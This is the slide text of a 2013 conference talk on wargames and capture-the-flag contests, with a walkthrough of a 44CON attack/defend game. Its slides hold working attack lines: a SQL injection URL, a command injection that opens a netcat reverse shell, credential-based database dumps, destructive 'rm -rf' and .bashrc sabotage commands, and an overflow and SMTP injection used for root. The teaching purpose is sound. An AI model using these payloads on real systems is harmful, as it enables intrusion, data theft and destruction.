Presented at BSides London 2013

1. Playing CTFs for Fun & Profit

2. Me
@impdefined
Software developer
Know a lot about bugs
Trying not to make things worse

3. Me
Playing CTFs for ~2 years
CTF team 0xbadf00d
Contributor to io.smashthestack.org

4. You

5. Wargames & CTFs

6. Wargames & CTFs – Why?
Learning
Hands-on experience
Legal
Fun!
(and profit)

7. Wargames & CTFs – Why?

8. Wargames

9. Wargames

10. Wargames
Technical security exercises

11. Wargames
Technical security exercises
Hacking challenges

12. Wargames
Technical security exercises
Hacking challenges
Progress through series of levels
No time limits
Solo

13. Wargames - categories
Web
Binary exploitation
Cryptography
General design flaws

14. Wargames - examples

23. Loaded 1 password hash (FreeBSD MD5 [32/32])
******* (administrator)
guesses: 1 time: 0:00:00:18 100% c/s: 13207 trying: ********

25. Wargames - experience

26. Playing wargames I got to:
Implement a padding oracle attack against RSA
Despair at the state of PHP
Implement a CPU timing attack
Exploit a kernel stack buffer overflow
Create a JS VM for a custom processor architecture
Write lots of custom shellcode
XOR all the things

27. Capture the Flag

28. Capture the Flag
Time-limited event to test your skills
Team-based
Competitive
Not “progressive”

29. CTF types
Challenge-based
DEF CON quals
Ghost In The Shellcode
CSAW CTF
Attack/defend
DEF CON finals
44Con CTF 2012

30. CTF types
Lots of online events
~20 last year
mainly challenge-based
Live events!
44CON: Lewt
RuCTFE: £3,000
Codegate: £11,000

31. Playing CTF

35. Capture the flag experience

36. Capture the flag experience

37. CTF challenge - jacked

38. CTF challenge - jacked
# nc jacked.final2012.ghostintheshellcode.com 2121
Jack's Blackjack Simulator
Blackjack pays 2:1
Dealer must hit soft 17
Single deck, shuffled after every round
Enter your name:
pwn
Your table companions:
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950
You have $1000
Place your bet (zero to exit): $

39. CTF challenge - jacked
$1,000,000,000 will win the game
Good random source
32bit seed
Player 1 is Tracy with $1332
Player 2 is Grace with $770
Player 3 is Curtis with $1376
Player 4 is Bryan with $1950

40. CTF challenge - jacked

41. CTF challenge - Folly
Text adventure
On winning, enter shellcode
Binary is chrooted, make custom code
Read “key” file...
get another port and binary

42. CTF challenge - Folly
x86_64
x86
ARM
ARM Thumb
PPC
Alpha
Cris

43. CTF challenge - blocky

44. CTF challenge - blocky

45. CTF challenge - blocky

46. CTF challenge - blocky

47. CTF challenge - blocky

48. CTF challenge - blocky

49. CTF challenge - blocky

50. 44CON CTF 2012

51. 44CON CTF 2012
Attack & Defend
Provided with:
Virtual machine
IP address
Ranges of target machines

52. Attack & Defend
Kind of like a pentest
but more fun
I have a plan
Recon
Harden
Write exploits
Run riot
Get the girl

53. Recon
I'd rather be offline than owned
Self-recon
Capture traffic
Quick nmap of non-player servers

54. Recon - services

55. Recon - services

56. Recon - scoring
Packet captures shed some light
Regular "scoring rounds“
Every 30 minutes
Scoring server stores new keys in
services and checks for previous
keys

57. Pastie

58. Pastie

59. Pastie

60. Pastie

61. Pastie
Written in PHP
Pastes stored in a MySQL database
PHP+MySQL
Can you tell what the vuln is yet?

62. Pastie vulnerability
Classic SQL injection

63. Pastie fix
It’s not all pwnpwnpwn
Updated code with prepared statements
PHP 

64. Pastie exploit
I want keys!

65. Pastie exploit
https://ip/view/%'+and+lang+=+'text'+order+by+
date+desc+--+

66. Pastie exploit

67. Pastie exploit – scripted

68. Mailserver

69. Mailserver
SMTP and POP3 server
Keys stored in emails
Written in Ruby
I don’t know Ruby
Only ~500 lines

70. Mailserver - vulnerability
This just interprets provided text as ruby code
Time to learn Ruby!
???

71. Mailserver - vulnerability
Looking at the logs...
Verify vulnerability

72. Mailserver - exploitation
I'm sure Ruby is lovely...
... but let's just find some code to copy

73. Mailserver - exploitation

74. Mailserver - exploitation

75. Mailserver - scripted

76. Auth

77. Auth
Listening on port 23500

78. Auth

79. Auth
Redis wrapper
Stores arbitrary strings

80. Auth vulnerability
Source analysis 101

81. Auth vulnerability

82. Auth exploitation
Classic stack buffer overflow
Overwrite return address with any value
Pre-auth remote code execution...

83. Auth exploitation
Classic stack buffer overflow
Overwrite return address with any value
Pre-auth remote code execution...
... noooope.

84. Auth exploitation

85. Auth exploitation
Put a valid writable address in the pointer
Easy if this was a 32bit process
64bit, annoying memory space

86. Auth exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x400000 0x403000 0x3000 0x0 /services/auth/auth
0x602000 0x603000 0x1000 0x2000 /services/auth/auth
0x603000 0x604000 0x1000 0x3000 /services/auth/auth
0x604000 0x625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]

87. Auth exploitation
gdb$ info proc map
Mapped address spaces:
Start Addr End Addr Size Offset objfile
0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth
0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth
0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth
0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap]
........ ........ ....... ... ......
0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack]
0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall](readonly)

88. Auth exploitation
Time’s up!
No remote code execution 
Very limited DoS
Crash process
Restarts automatically

89. Servicemon

90. Servicemon

91. Servicemon

92. Servicemon

93. Servicemon
Command injection via "filelist"
parameter

94. Servicemon - vulnerability
filelist=/services/auth/auth
%x(shasum /services/auth/auth)
filelist=notafile || id
%x(shasum notafile || id)

95. Servicemon - vulnerability

96. Servicemon - exploitation
Never mind keys, I want a shell
contestant@ubuntu:~$ nc -l 31337 -e /bin/sh
nc: invalid option -- 'e'

97. Servicemon - exploitation
Stand back... I know bash*
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc 192.168.1.75 31337 >/tmp/f
http://ip:3000/hash?filelist=notafile||rm%20%2Ftmp
%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%
2Ftmp%2Ff%7C%2Fbin%2Fsh%20-
i%202>%261%7Cnc%20192.168.1.75%203133
7%20>%2Ftmp%2Ff
* totally copied from somewhere

98. Servicemon - exploitation
contestant@ubuntu:~$ nc -lv 31337
Connection from 192.168.1.72 port 31337 [tcp/*]
accepted
$ whoami
contestant
$ pwd
/services/servicemon
I got a shell!
Now I can have some fun!

99. Rampage

100. Rampage

101. Steal all the keys
mysql --user=sinatra --password=44ConCTF servicemon -e
"select status from statuses order by created_at desc
limit 1;"
mysql --user=pastie --password=J@cobsClub$ paste -e
"select pastie from pastie order by date desc limit 1;"
OUTPUT=redis-cli -r 1 keys * | tail -n 1
redis-cli -r 1 lrange $OUTPUT 0 1

102. Leave a calling card
echo 'Look behind you! A three-headed monkey!' >
/services/pastie/.win

103. Annoy
echo exit >> ~/.bashrc
rm -rf /services
echo 'export
PROMPT_COMMAND="cd"' >>
~/.bashrc

104. Escalation

105. Escalation
Getting keys is fine
Getting shells is better
Getting root is best

106. Escalation – the hard way
$ find /etc -writable
/etc/init/mail.conf
/etc/init/auth.conf

107. Escalation – the hard way
USER PID TTY STAT COMMAND
root 8680 ? Ss /services/auth/auth

108. Escalation – the hard way
When auth starts we will get a root shell
Lame DoS to the rescue!
perl -e 'print "auth " . "A"x1100 . "n"' |
nc ip 23500
Connection from 192.168.1.73 port 31337 [tcp/*]
accepted
# whoami
root

109. Escalation – the easy way
220 Mail Service ready (33147)
HELO
250 Requested mail action okay, completed
EXPN respond(client, %x(whoami))
root

110. Playing wargames & CTFs

111. Useful stuff – general
Scripting language
Hex editor
Linux & Windows VMs
The linux “file” command

112. Useful stuff - web
Firefox
+ Firebug
+ Tamper data
php.net

113. Useful stuff - binary
C
Disassembler (IDA demo, Hopper)

114. Useful stuff - CTF
Collaboration!
Hall.com
sync.in
Wiki
IRC

115. Wargame recommendations
overthewire.org (Natas) Web exploitation
io.smasthestack.org Binary exploitation
hackthissite.org Web exploitation
overthewire.org
(Vortex)
Binary exploitation
overthewire.org
(Bandit)
"Absolute beginners" (learn how to
Linux)

116. CTF recommendations
http://ctftime.org
DEF CON CTF
June
Binary-heavy
CSAW CTF
“gentle” introduction
September

117. Motivation
44CON Lewt
CSAW £600
HitB AMS £1,500
Plaid £2,500
RuCTFE £3,000
PHdays £6,000
Codegate £11,000

118. Motivation

119. Questions
@impdefined
impdefined@0xbadf00d.co.uk